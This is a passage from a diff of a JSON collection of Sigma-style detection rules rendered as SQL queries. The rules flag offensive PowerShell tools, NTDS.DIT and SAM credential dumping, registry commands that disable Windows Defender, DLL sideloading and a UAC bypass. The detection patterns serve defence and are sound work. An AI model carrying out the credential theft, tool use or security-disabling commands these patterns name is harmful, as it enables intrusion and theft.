'%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "GALLIUM IOCs", - "id": "440a56bf-7873-4439-940a-1c8a671073c2", + "title": "FoggyWeb Backdoor DLL Loading", + "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", "status": "test", - "description": "Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.", - "author": "Tim Burrell", + "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected \"version.dll\" dll", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1212", - "attack.t1071", - "attack.g0093" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Hashes LIKE '%SHA256=9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945%' ESCAPE '\\' OR Hashes LIKE '%SHA256=51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79%' ESCAPE '\\' OR Hashes LIKE '%SHA256=332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08%' ESCAPE '\\' OR Hashes LIKE '%SHA256=63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef%' ESCAPE '\\' OR Hashes LIKE '%SHA256=056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53a44c2396d15c3a03723fa5e5db54cafd527635%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c5e496921e3bc882dc40694f1dcc3746a75db19%' ESCAPE '\\' OR Hashes LIKE '%SHA1=aeb573accfd95758550cf30bf04f389a92922844%' ESCAPE '\\' OR Hashes LIKE '%SHA1=79ef78a797403a4ed1a616c68e07fff868a8650a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4f6f38b4cec35e895d91c052b1f5a83d665c2196%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e841a63e47361a572db9a7334af459ddca11347a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c28f606df28a9bc8df75a4d5e5837fc5522dd34d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e94b305d6812a9f96e6781c888e48c7fb157b6b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dd44133716b8a241957b912fa6a02efde3ce3025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8793bf166cb89eb55f0593404e4e933ab605e803%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a39b57032dbb2335499a51e13470a7cd5d86b138%' ESCAPE '\\' OR Hashes LIKE '%SHA1=41cc2b15c662bc001c0eb92f6cc222934f0beeea%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d209430d6af54792371174e70e27dd11d3def7a7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1c6452026c56efd2c94cea7e0f671eb55515edb0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6b41d3afdcdcaf9f442bbe772f5da871801fd5a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4923d460e22fbbf165bbbaba168e5a46b8157d9f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2%' ESCAPE '\\') OR sha256 IN ('9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd', '7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b', '657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5', '2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29', '52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77', 'a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3', '5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022', '6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883', '3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e', '1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7', 'fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1', '7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c', '178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945', '51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9', '889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79', '332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf', '44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08', '63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef', '056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070') OR sha1 IN ('53a44c2396d15c3a03723fa5e5db54cafd527635', '9c5e496921e3bc882dc40694f1dcc3746a75db19', 'aeb573accfd95758550cf30bf04f389a92922844', '79ef78a797403a4ed1a616c68e07fff868a8650a', '4f6f38b4cec35e895d91c052b1f5a83d665c2196', '1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d', 'e841a63e47361a572db9a7334af459ddca11347a', 'c28f606df28a9bc8df75a4d5e5837fc5522dd34d', '2e94b305d6812a9f96e6781c888e48c7fb157b6b', 'dd44133716b8a241957b912fa6a02efde3ce3025', '8793bf166cb89eb55f0593404e4e933ab605e803', 'a39b57032dbb2335499a51e13470a7cd5d86b138', '41cc2b15c662bc001c0eb92f6cc222934f0beeea', 'd209430d6af54792371174e70e27dd11d3def7a7', '1c6452026c56efd2c94cea7e0f671eb55515edb0', 'c6b41d3afdcdcaf9f442bbe772f5da871801fd5a', '4923d460e22fbbf165bbbaba168e5a46b8157d9f', 'f201504bd96e81d0d350c3a8332593ee1c9e09de', 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2')))" + "SELECT * FROM logs WHERE ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\'" ], - "filename": "proc_creation_win_apt_gallium_iocs.yml" + "filename": "image_load_malware_foggyweb_nobelium.yml" }, { - "title": "Suspicious Process Patterns NTDS.DIT Exfil", - "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", + "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", "status": "experimental", - "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '\tC:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntds.yml" + "filename": "image_load_dll_vssapi_susp_load.yml" }, { - "title": "Potential Emotet Rundll32 Execution", - "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", + "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", "status": "test", - "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", - "author": "FPT.EagleEye", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" ], - "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" + "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" }, { - "title": "Lazarus Group Activity", - "id": "24c4d154-05a4-4b99-b57d-9b977472443a", - "status": "test", - "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "DLL Sideloading Of DBGCORE.DLL", + "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_lazarus_group_activity.yml" + "filename": "image_load_side_load_dbgcore_dll.yml" }, { - "title": "Reg Disable Security Service", - "id": "5e95028c-5229-4214-afae-d653d573d0ec", + "title": "Potential DLL Sideloading Via comctl32.dll", + "id": "6360757a-d460-456c-8b13-74cf0e60cceb", "status": "experimental", - "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", - "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", + "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown", - "Other security solution installers" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_disable_sec_services.yml" + "filename": "image_load_side_load_comctl32.yml" }, { - "title": "WmiPrvSE Spawned PowerShell", - "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", - "status": "stable", - "description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a signe of remote access via WMI", - "author": "Markus Neis @Karneades", + "title": "UAC Bypass Using Iscsicpl - ImageLoad", + "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "status": "experimental", + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "AppvClient", - "CCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll'))) AND NOT ((CommandLine = 'null') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" + "filename": "image_load_uac_bypass_iscsicpl.yml" }, { - "title": "Suspicious Process Parents", - "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", - "status": "experimental", - "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", - "author": "Florian Roth (Nextron Systems)", + "title": "Time Travel Debugging Utility Usage - Image", + "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", + "status": "test", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" + ], "falsepositives": [ - "Unknown" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR 